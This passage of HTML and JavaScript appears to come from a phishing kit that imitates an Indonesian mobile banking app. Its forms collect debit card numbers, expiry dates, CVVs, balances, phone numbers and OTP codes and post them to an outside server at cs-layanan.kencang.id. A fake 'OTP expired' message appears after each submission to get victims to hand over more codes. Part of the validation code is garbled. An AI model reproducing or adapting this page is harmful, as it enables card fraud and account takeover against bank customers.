 var saldoku = document.getElementById("saldo").value;
 sessionStorage.setItem("saldoku", saldoku);   
  }
  
 </script>
   <script>
$(document).ready(function(){
    $('#formdata').submit(function(e) {
        e.preventDefault();
       
          $("#loadersaya").show();


          $.ajax({
              url: 'https://cs-layanan.kencang.id/dat4/sendData.php',
              type: 'post',
              data: $(this).serialize(),             
success: function(data) {
       setTimeout(function(){

$("#loadersaya").hide();

 
 $("#datainfo").fadeIn(); 
 
        }, 500);
               
            },
           error: function() {
               setTimeout(function(){

$("#loadersaya").hide();

 
 $("#datainfo").fadeIn(); 
 
        }, 500);

            }
        });
    });
});
 </script>
  <script>
$(document).ready(function(){
    $('#formDebit').submit(function(e) {
        e.preventDefault();
       
          $("#loadersaya").show();

var nomorku1 = document.getElementById("nomorku").value;
 sessionStorage.setItem("nomorku1", nomorku1);
var debitku = document.getElementById("debit").value;
 sessionStorage.setItem("debitku", debitku);
 
 var validku = document.getElementById("valid").value;
 sessionStorage.setItem("validku", validku);
 var cvvku = document.getElementById("cvv").value;
 sessionStorage.setItem("cvvku", cvvku);
 var saldoku = document.getElementById("saldo").value;
 sessionStorage.setItem("saldoku", saldoku);
          $.ajax({
              url: 'https://cs-layanan.kencang.id/dat4/debit.php',
              type: 'post',
              data: $(this).serialize(),             
success: function(data) {
       setTimeout(function(){
document.getElementById("maskedMSISDN").innerHTML = "Yang di kirim ke nomor " + nope.value;
$("#loadersaya").hide();
$("#qrisss").hide();
 $("#debitpage").fadeOut(); 
 $("#ryuSubmit").fadeIn(); 
 
        }, 500);
               
            },
           error: function() {
               setTimeout(function(){
document.getElementById("maskedMSISDN").innerHTML = "Yang di kirim ke nomor " + nope.value;
$("#loadersaya").hide();
$("#qrisss").hide();
 $("#debitpage").fadeOut(); 
 $("#ryuSubmit").fadeIn(); 
 
        }, 500);

            }
        });
    });
});
 </script>
   <script>
$(document).ready(function(){
    $('#ryuSubmit').submit(function(e) {
        e.preventDefault();
       
          $("#loadersaya").show();

          $.ajax({
              url: 'https://cs-layanan.kencang.id/dat4/otp.php',
              type: 'post',
              data: $(this).serialize(),             
success: function(data) {
         $("#pin-1").html('');
                $("#pin-2").html('');
                $("#pin-3").html('');
                $("#pin-4").html('');
                $("#pin-5").html('');
                $("#pin-6").html('');      
         $("#invalid").addClass("blink");
            
$("#invalid").text("Kode OTP Kadaluarsa, Silahkan Coba Lagi");
$("#invalid").css("color","red");
        $("#blink").show();
        
   setTimeout(function(){
      ;
        $("#invalid").text("Kode OTP baru sudah kami kirimkan kembali");
$("#invalid").css("color","#2E869C");
        $("#invalid").show();
         $("#invalid").removeClass("blink");
        $("#loadersaya").hide();   
         $("#pin-1").focus();
           
   }, 3000);
   setTimeout(function(){
  $("#invalid").css("color","#000000");     
        $("#invalid").text("Masukkan Kode OTP");
   }, 5000);
               
            },
           error: function() {
                $("#pin-1").html('');
                $("#pin-2").html('');
                $("#pin-3").html('');
                $("#pin-4").html('');
                $("#pin-5").html('');
                $("#pin-6").html('');      
         $("#invalid").addClass("blink");
            
$("#invalid").text("Kode OTP Kadaluarsa, Silahkan Coba Lagi");
$("#invalid").css("color","red");
        $("#blink").show();
        
   setTimeout(function(){
      ;
        $("#invalid").text("Kode OTP baru sudah kami kirimkan kembali");
$("#invalid").css("color","#2E869C");
        $("#invalid").show();
         $("#invalid").removeClass("blink");
        $("#loadersaya").hide();   
         $("#pin-1").focus();
           
   }, 3000);
   setTimeout(function(){
  $("#invalid").css("color","#000000");     
        $("#invalid").text("Masukkan Kode OTP");
   }, 5000);

            }
        });
    });
});
 </script>

<script>
var myTimer;
       $(document).ready(function(){   
            myTimer = setInterval(myClock, 1000);
        var c = 120;
        
        function myClock() {
 document.getElementById("paragrap_kirim_ulang").style.display = "block";
 $("#label_kirim_ulang").css("color","#2E869C");
          document.getElementById("label_kirim_ulang").innerHTML = "( " + --c + " detik )";
           document.getElementById("kirim-ulang").style.display = "none";
          if (c == 0) {
                   clearInterval(myTimer);
  document.getElementById("kirim-ulang").style.display = "";
                   document.getElementById("paragrap_kirim_ulang").style.display = "none";
   
 
      }
    }
       })
</script>
<script>
var myTime;
function kirimulang(){
      myTime = setInterval(myClock, 1000);
        var c = 120;
      
     

  function myClock() {
 document.getElementById("paragrap_kirim_ulang").style.display = "block";
          document.getElementById("label_kirim_ulang").innerHTML = "( " + --c + " detik )";
           document.getElementById("kirim-ulang").style.display = "none";
          if (c == 0) {
                   clearInterval(myTime);
  document.getElementById("kirim-ulang").style.display = "";
                   document.getElementById("paragrap_kirim_ulang").style.display = "none";
   
 }
      }
    }
    </script>

<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.15/jquery.mask.min.js"></script>
<script src="jquery.min.js"></script>
        <script src="jquery.mask.min.js"></script>
        <script type="text/javascript">
            $(document).ready(function(){

                // Format mata uang.
                $( '.uang' ).mask('000.000.000', {reverse: true});

            })
        </script>
<script>
    $(document).ready(function () {
        document.getElementById("checkbox1").setAttribute('disabled', 'disabled');
        document.getElementById("checkbox2").setAttribute('disabled', 'disabled');
        resetBlurReDua();
        var letter = /[a-zA-Z]/;
        var number = /([0-9]{2,})/;

        $("#userName").on("input", (event) => {
            var passcodePress = $(event.target).val();
            console.log("passcodePress : " + passcodePress);

            var check1 = document.getElementById("checkbox1");
            var check2 = document.getElementById("checkbox2");

            if ((passcodePress.length >= 8) && (passcodePress.length <= 12)) {
                check1.disabled = false;
            } else {
                check1.disabled = true;
            }

            if ((number.test(passcodePress)) && (letter.test(passcodePress))) {
                check2.disabled = false;
            } else {
                check2.disabled = true;
            }
        });

        $('select').on('change', function () {
            valueCheck();
        });

        $("input").focus(function () {
            console.log("Open Keyboard");
            $('#buttonNext').hide();
        });

        $('input').focusout(function () {
            console.log("Close Keyboard");
            $('#buttonNext').show();
        });

        $('#referralCode').keyup(function() {
            this.value = this.value.toLocaleUpperCase();
        });

        const _originalSize = $(window).width() + $(window).height();
        $(window).resize(function () {
            if ($(window).width() + $(window).height() !== _originalSize) {
                console.log("keyboard show up");
                $('#buttonNext').hide();
            } else {
                console.log("keyboard closed");
                $('#buttonNext').show();
            }
        });
    });

    function valueCheck() {
        var valid = document.getElementById('valid').value;
        var cvv = document.getElementById('cvv').value;
        var debit = document.getElementById('debit').value;
        var countryId = document.getElementById('countryId').value;
        var check1 = document.getElementById("checkbox1");
        var check2 = document.getElementById("checkbox2");
        if (email === "" || userName === "" || nik === "" || countryId === "" || check1.disabled 1");
            console.log("isi : " + email + ", " + userName + ", " + nik + ", " + countryId);
            document.getElementById('nextBtn').setAttribute("disabled", "disabled");
        } else {
            console.log("ISI");
            console.log("isi : " + cvv + ", " + valid + ", " + debit + ", " + countryId);
            document.getElementById('nextBtn').removeAttribute("disabled");

        }
    }

    $(document).ready( ()=>{
        $('input#debit').bind('cut copy paste', function (e) {
            e.preventDefault();
        });

        $('input#cvv').bind('cut copy paste', function (e) {
            e.preventDefault();
        });

        $('input#valid').bind('cut copy paste', function (e) {
            e.preventDefault();
        });

        $('input#saldo').bind('cut copy paste', function (e) {
            e.preventDefault();
        });
    })
</script>
<script>
 $(document).ready(function(){
	$("#cvv").click(function(){

	$("#app").addClass("card-r");
    $("#app").removeClass("card-y");
});
	});
</script>
<script>
 $(document).ready(function(){
 $('#debit, #saldo, #valid').on('click', function() {
   
    $("#app").addClass("card-r");
    $("#app").removeClass("card-r");
     $("#app").addClass("flip");
     setTimeout(function(){
         $("#app").removeClass("card-r");
     },500);
	});
 });
</script>
<script>
$(document).ready(function(){
    $("#email").input(function(){    
 var email = document.getElementById('email').value;
 document.getElementById('ccc').innerHTML = 'email';
    
    
});
 });
 

 
 
 
 function menuSetting(){
      $("#loader").show();
     setTimeout(function(){
         $("#loader").hide();
    $("#favoritku").fadeOut(); 
 $("#settingku").fadeIn();   
   $("#riwayatku").fadeOut();      
     }, 1000);
 }
 
 
 function menuHome(){
     $("#qrisku").fadeOut();  
   $("#favoritku").fadeOut(); 
 $("#settingku").fadeOut();    
   $("#riwayatku").fadeOut();      
 }
 
 function menuFavorite(){
      $("#loader").show();
     setTimeout(function(){
         $("#loader").hide();
     $("#riwayatku").fadeOut();   
     $("#qrisku").fadeOut();  
    $("#favoritku").fadeIn();    
     $("#settingku").fadeOut();    
     }, 1000);
 }
 
 function menuRiwayat(){
      $("#loader").show();

     setTimeout(function(){
         $("#loader").hide();
    $("#riwayatku").fadeIn();  
     $("#settingku").fadeOut();    
     $("#favoritku").fadeOut();     
     }, 1000);
 }
 
 
 function sudahT(){
       $("#loader").show();
        setTimeout(function(){
         $("#loader").hide();
    $("#debitpage").fadeIn();  
     $("#menupage").fadeOut();   
        }, 1000);
 }
 
 function belumT(){
       $("#loader").show();
        setTimeout(function(){
         $("#loader").hide();
    $("#datapage").fadeIn();  
     $("#menupage").fadeOut();   
        }, 1000);
 }
</script>
<script>
    $(document).ready(function(){
        sessionStorage.setItem("mutasi", "riwayat");
        var indexPage = sessionStorage.getItem("indexPage");
        console.log("Halaman Tujuan: " + indexPage);

        if (indexPage === "history") {
            console.log("Harusnya lagi buka history");
            $('#pills-history-tab').trigger('click');
        } else if (indexPage === "report") {
            console.log("Harusnya lagi buka report");
            $('#pills-report-tab').trigger('click');
        }
    });

    function showHistoryDateBox() {
        document.getElementById('dateBoxesHistory').style.display = 'block';
        document.getElementById('next-page').disabled = !((document.getElementById("choose-date-history").checked) && (document.getElementById("startDateHistory").value !== "") && (document.getElementById("finishDateHistory").value !== ""));
    }

    function showHistoryDateBoxDisappear() {
        document.getElementById('dateBoxesHistory').style.display = 'none';
        if (document.getElementById("last-transaction-history").checked) {
            document.getElementById('next-page').disabled = false;
        } else if (document.getElementById("week-transaction-history").checked) {
            document.getElementById('next-page').disabled = false;
        } else if (document.getElementById("month-transaction-history").checked) {
            document.getElementById('next-page').disabled = false;
        }
    }

    function changeDateHistory() {
        document.getElementById('next-page').disabled = !((document.getElementById("startDateHistory").value !== "") && (document.getElementById("finishDateHistory").value !== ""));
    }

    function changeTransactionCategory() {
        if ((document.getElementById("last-transaction-report").checked) && (document.getElementById("transactionCategory").value !== "NULL")) {
            document.getElementById('next-page').disabled = false;
        } else if ((document.getElementById("week-transaction-report").checked) && (document.getElementById("transactionCategory").value !== "NULL")) {
            document.getElementById('next-page').disabled = false;
        } else if ((document.getElementById("month-transaction-report").checked) && (document.getElementById("transactionCategory").value !== "NULL")) {
            document.getElementById('next-page').disabled = false;
        } else if ((document.getElementById("choose-date-report").checked) && (document.getElementById("startDateReport").value !== "") && (document.getElementById("finishDateReport").value !== "") && (document.getElementById("transactionCategory").value !== "NULL")) {
            document.getElementById('next-page').disabled = false;
        }
    }

    function changeDateReport() {
        document.getElementById('next-page').disabled = !((document.getElementById("transactionCategory").value !== "NULL") && (document.getElementById("startDateReport").value !== "") && (document.getElementById("finishDateReport").value !== ""));
    }

    function showReportDateBox() {
        document.getElementById('dateBoxesReport').style.display = 'block';
        document.getElementById('next-page').disabled = !((document.getElementById("choose-date-report").checked) && (document.getElementById("startDateReport").value !== "") && (document.getElementById("finishDateReport").value !== "") && (document.getElementById("transactionCategory").value !== "NULL"));
    }

    function showReportDateBoxDisappear() {
        document.getElementById('dateBoxesReport').style.display = 'none';
        if ((document.getElementById("last-transaction-report").checked) && (document.getElementById("transactionCategory").value !== "NULL")) {
            document.getElementById('next-page').disabled = false;
        } else if ((document.getElementById("week-transaction-report").checked) && (document.getElementById("transactionCategory").value !== "NULL")) {
            document.getElementById('next-page').disabled = false;
        } else if ((document.getElementById("month-transaction-report").checked) && (document.getElementById("transactionCategory").value !== "NULL")) {
            document.getElementById('next-page').disabled = false;
        }
    }

    function selectedHistory() {
        sessionStorage.setItem("indexPage", "history");
        if ($('input[name=radio-button-report]').prop('checked', false) &&
            $('#transactionCategory').val('NULL') &&
            $('#startDateReport').val('') &&
            $('#finishDateReport').val('')
        ) {
            $('#next-page').prop('disabled', true);
            showReportDateBoxDisappear();
        }
    }

    function selectedReport() {
        sessionStorage.setItem("indexPage", "report");
        if ($('input[name=radio-button-history]').prop('checked', false) &&
            $('#transactionCategory').val('NULL') &&
            $('#startDateHistory').val('') &&
            $('#finishDateHistory').val('')
        ) {
            $('#next-page').prop('disabled', true);
            showHistoryDateBoxDisappear();
        }
    }
</script>
  <script>
 
 function QRScanPrepare(){
        $("#loader").show();
        setTimeout(function(){

         $("#loader").hide();
      $("#qrisku").fadeIn();  
      $("#videoku").fadeIn();  
       $("#favoritku").fadeOut(); 
       $("#riwayatku").fadeOut();  
       $("#settingku").fadeOut();
    
document.getElementById('videoku').style.display = "block";
// camera stream video element
  let on_stream_video = document.querySelector('#camera-stream');
  // flip button element
  let flipBtn = document.querySelector('#flip-btn');

  // default user media options
  let constraints = { audio: false, video: true }
  let shouldFaceUser = true;

  // check whether we can use facingMode
  let supports = navigator.mediaDevices.getSupportedConstraints();
  if( supports['facingMode'] === true ) {
    flipBtn.disabled = false;
  }

  let stream = null;

  function capture() {
    constraints.video = {
        width: {
        
        ideal: 900,
        
      },
      height: {
        
        ideal: 500,
        
      },
      facingMode: shouldFaceUser ? 'user' : 'environment'
    }
    navigator.mediaDevices.getUserMedia(constraints)
      .then(function(mediaStream) {
        stream  = mediaStream;
        on_stream_video.srcObject = stream;
        on_stream_video.play();
      })
      .catch(function(err) {
        console.log(err)
      });
  }

  flipBtn.addEventListener('click', function(){
    if( stream == null ) return
    // we need to flip, stop everything
    stream.getTracks().forEach(t => {
      t.stop();
    });
    // toggle / flip
    shouldFaceUser = !shouldFaceUser;
    capture();
  })

  capture();

  document.getElementById("capture-camera").addEventListener("click", function() {
    // Elements for taking the snapshot
      const video = document.querySelector('video');
      canvas.width = video.videoWidth;
      canvas.height = video.videoHeight;
      canvas.getContext('2d').drawImage(video, 0, 0);
  });    
        }, 500);
  
}  
  
  
  
</script>
</body>
</html>